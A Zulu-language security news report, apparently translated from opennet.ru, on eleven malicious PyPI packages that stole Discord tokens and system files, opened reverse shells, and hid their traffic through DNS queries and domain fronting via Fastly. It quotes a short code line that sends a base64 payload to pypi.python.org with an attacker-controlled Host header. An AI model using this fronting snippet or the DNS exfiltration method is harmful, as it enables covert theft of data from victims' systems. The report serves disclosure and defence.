Kuhla lwemibhalo lwe-PyPI (Python Package Index), amaphakheji ayi-11 aqukethe ikhodi enonya akhonjwe. Ngaphambi kokuthi kutholakale izinkinga, amaphakheji alayishwe cishe izikhathi eziyizinkulungwane ezingama-38 esewonke. Amaphakheji anonya atholiwe aphawuleka ngokusebenzisa kwawo izindlela eziyinkimbinkimbi zokufihla iziteshi zokuxhumana ngamaseva abahlaseli.
- i-package ebalulekile (okulandwayo okungu-6305), iphakheji elibalulekile (12897) - isungule uxhumano kwiseva yangaphandle ngaphansi kwesithunzi sokuxhuma ku-pypi.python.org ukuze inikeze ukufinyelela kwegobolondo kusistimu (igobolondo elibuyela emuva) futhi yasebenzisa uhlelo lwe-trevorc2 ukufihla isiteshi sokuxhumana.
- i-pptest (10001), i-ipboards (946) - isebenzise i-DNS njengesiteshi sokuxhumana ukudlulisa ulwazi mayelana nesistimu (ephaketheni lokuqala igama lomsingathi, uhla lwemibhalo olusebenzayo, i-IP yangaphakathi neyangaphandle, kwesibili - igama lomsebenzisi negama lomsingathi) .
- u-owlmoon (3285), i-DiscordSafety (557), yiffparty (1859) - ihlonze ithokheni yesevisi ye-Discord kusistimu futhi yalithumela kumsingathi wangaphandle.
- I-trrfab (287) - ithumele isihlonzi, igama lomsingathi nokuqukethwe kwe-/etc/passwd, /etc/hosts,/home kumsingathi wangaphandle.
- I-10Cent10 (490) - isungule uxhumano lwegobolondo elibuyela emuva nomsingathi wangaphandle.
- i-yandex-yt (4183) - ibonise umlayezo mayelana nesistimu efakwa ebucayini futhi iqondiswe kabusha ekhasini elinolwazi olwengeziwe mayelana nezenzo ezengeziwe ezikhishwe nge-nda.ya.ru (api.ya.cc).
Okuphawuleka ngokukhethekile indlela yokufinyelela ababungazi bangaphandle abasetshenziswa ephaketheni elibalulekile namaphakheji ephakheji abalulekile, asebenzise inethiwekhi yokulethwa kwe-Fastly content esetshenziswa kunkomba ye-PyPI ukufihla umsebenzi wabo. Eqinisweni, izicelo zithunyelwe kuseva ye-pypi.python.org (okuhlanganisa nokucacisa igama elithi python.org ku-SNI ngaphakathi kwesicelo se-HTTPS), kodwa isihloko esithi “Host” se-HTTP sasihlanganisa igama leseva elilawulwa abahlaseli (isekhondi. phambili.io. global.prod.fastly.net). Inethiwekhi yokulethwa kokuqukethwe ithumele isicelo esifanayo kuseva ehlaselayo, isebenzisa imingcele yoxhumano lwe-TLS ku-pypi.python.org lapho ithumela idatha.
Ingqalasizinda ye-PyPI inikwa amandla inethiwekhi yokulethwa kwe-Fastly content, esebenzisa ummeleli osobala we-Varnish ukuze igcine izicelo ezivamile, futhi isebenzisa ukucubungula kwesitifiketi se-TLS ezingeni le-CDN, esikhundleni samaseva wokugcina, ukuze idlulisele izicelo ze-HTTPS ngommeleli. Kungakhathalekile ukuthi imuphi umsingathi oqondisiwe, izicelo zithunyelwa kummeleli, onquma umsingathi ofunwayo kusetshenziswa unhlokweni we-HTTP “Umsingathi”, futhi amagama wesizinda sosokhaya aboshelwe kumakheli e-IP ebhalansi womthwalo we-CDN ajwayelekile kuwo wonke amaklayenti e-Fastly.
Iseva yabahlaseli iphinde ibhalise ne-CDN Fastly, ehlinzeka ngezinhlelo zamahhala kuwo wonke umuntu futhi ivumela nokubhaliswa ngokungaziwa. Kuyaphawuleka ukuthi ukuthumela izicelo kusisulu lapho udala "igobolondo elihlanekezelwe", uhlelo luphinde lusetshenziswe, kodwa luqaliswe ohlangothini lomsingathi womhlaseli. Ngaphandle, ukusebenzisana neseva yabahlaseli kubukeka njengeseshini esemthethweni ngohla lwemibhalo lwe-PyPI, olubethelwe kusetshenziswa isitifiketi se-PyPI TLS. Indlela efanayo, eyaziwa ngokuthi "isizinda sangaphambili," yayisetshenziswa ngaphambilini ukufihla igama lomsingathi lapho weqa ukuvimbela, kusetshenziswa ikhono elinikezwe kwamanye amanethiwekhi e-CDN ukufinyelela i-HTTPS ngokubonisa umsingathi ongelona iqiniso ku-SNI futhi empeleni adlulisele igama le- ucele umsingathi kusihloko Sosokhaya we-HTTP ngaphakathi kweseshini ye-TLS.
Ukuze kufihlwe umsebenzi omubi, iphakheji le-TrevorC2 liphinde lasetshenziselwa ukwenza ukusebenzisana neseva okufana nokuzulazula kwewebhu okuvamile, isibonelo, izicelo ezinonya zithunyelwe ngokucatshangelwa ukulanda isithombe “https://pypi.python.org/images/ guid=” ngolwazi olufakwe kupharamitha ye-guid. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Amaphakheji we-pptest nama-ipboards asebenzise indlela ehlukile yokufihla umsebenzi wenethiwekhi, ngokusekelwe ekubhaleni ulwazi oluwusizo emibuzweni yeseva ye-DNS. Uhlelo olungayilungele ikhompuyutha ludlulisa ulwazi ngokwenza izicelo ze-DNS ezifana nokuthi “nu4timjagq4fimbuhe.example.com”, lapho idatha edluliselwa kuseva yokulawula ibhalwa ngekhodi kusetshenziswa ifomethi ye-base64 egameni lesizinda esingaphansi kwesinye. Umhlaseli uthola le milayezo ngokulawula iseva ye-DNS yesizinda se-example.com.
Source: opennet.ru